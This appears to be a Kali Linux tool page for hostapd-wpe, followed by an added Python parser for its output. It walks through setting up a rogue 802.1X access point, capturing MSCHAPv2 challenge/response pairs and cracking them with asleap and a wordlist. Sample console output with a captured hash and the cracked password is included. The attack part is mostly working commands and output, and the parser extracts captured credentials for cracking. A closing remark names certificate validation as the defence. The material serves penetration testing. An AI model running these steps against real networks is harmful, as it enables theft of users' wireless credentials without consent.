hostapd-wpe Introduction

hostapd-wpe is the replacement for FreeRADIUS-WPE.
It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks.

For impersonation, hostapd-wpe supports the following EAP types:
1. EAP-FAST/MSCHAPv2 (Phase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP

Once impersonated, hostapd-wpe returns an EAP-Success message so that clients believe they are connected to a legitimate authenticator.

For 802.11 clients, hostapd-wpe also implements Karma-style gratuitous probe responses. This was inspired by JoMo-Kun's patch for older versions of hostapd.

Author: Thomas d'Otreppe
License: BSD license

Tool source
Tool homepage
Kali hostapd-wpe repo
Kali hostapd-wpe package

hostapd-wpe: modified hostapd to facilitate AP impersonation attacks

Update your Kali installation and install hostapd-wpe if it is not already present.

root@kali:~# apt update
root@kali:~# apt install hostapd-wpe

Once installed, configure the AP's properties by editing /etc/hostapd-wpe/hostapd-wpe.conf

root@kali:~# nano /etc/hostapd-wpe/hostapd-wpe.conf

Stop the network-manager process using airmon-ng

root@kali:~# airmon-ng check kill

Start hostapd-wpe. A wireless AP will appear. Credentials of users who connect and authenticate to this network will be printed to the console.

root@kali:~# hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Configuration file: /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0 with hwaddr c4:e9:84:17:ff:c8 and ssid "hostapd-wpe"
wlan0: interface state UNINITIALIZED>ENABLED
wlan0: AP-ENABLED
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: authenticated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED ac:fd:ec:78:72:bd
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267

wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: disassociated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: deauthenticated due to local deauth request
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0

Once you have obtained challenge/response handshakes, crack them with asleap together with a password dictionary file.

root@kali:~# zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e:0e:9d:0b:5a:3f:f5:23 -R 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67 -W -

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using STDIN for words.
hash bytes: 586c
NT hash: 8846f7eaee8fb117ad06bdd830b7586c
password: password
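The following parser is an added example, not code from the original page or from the hostapd-wpe project: it reads the mschapv2 block that hostapd-wpe prints to the console and rebuilds the john-the-ripper NETNTLM line from the challenge and response fields, making explicit that the 8-byte "challenge" is the MSCHAPv2 ChallengeHash and the 24-byte response is the DES-based NT-Response, which is exactly why a captured pair can be attacked offline like NTLMv1. The sample log is constructed from the output shown above.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample mirroring the hostapd-wpe console output shown above.
SAMPLE_LOG = """\
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267

wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
"""

# One "mschapv2:" block: timestamp, username, colon-separated hex challenge and response.
BLOCK_RE = re.compile(
    r"^mschapv2: (?P<ts>.+)\nusername: (?P<user>.+)\n"
    r"challenge: (?P<chal>[0-9a-fA-F:]+)\nresponse: (?P<resp>[0-9a-fA-F:]+)$",
    re.MULTILINE,
)

@dataclass
class MschapV2Capture:
    timestamp: str
    username: str
    challenge: bytes  # 8-byte MSCHAPv2 ChallengeHash, already derived by the AP
    response: bytes   # 24-byte NT-Response: three DES blocks keyed from the NT hash

    def netntlm(self) -> str:
        """Rebuild the john-the-ripper NETNTLM line that hostapd-wpe prints."""
        return f"{self.username}:$NETNTLM${self.challenge.hex()}${self.response.hex()}"

def parse_captures(log: str) -> List[MschapV2Capture]:
    """Extract every mschapv2 block from hostapd-wpe console output."""
    captures = []
    for m in BLOCK_RE.finditer(log):
        chal = bytes.fromhex(m["chal"].replace(":", ""))
        resp = bytes.fromhex(m["resp"].replace(":", ""))
        # The NETNTLM format needs exactly an 8-byte challenge and a 24-byte response.
        if len(chal) != 8 or len(resp) != 24:
            raise ValueError(f"malformed mschapv2 block for user {m['user']!r}")
        captures.append(MschapV2Capture(m["ts"], m["user"], chal, resp))
    return captures
```

Because the response depends only on the challenge and the user's NT hash, the server certificate check on the client is the control that matters: a supplicant that accepts any EAP-Success without validating the RADIUS server certificate hands over a crackable pair to whoever answers its probe.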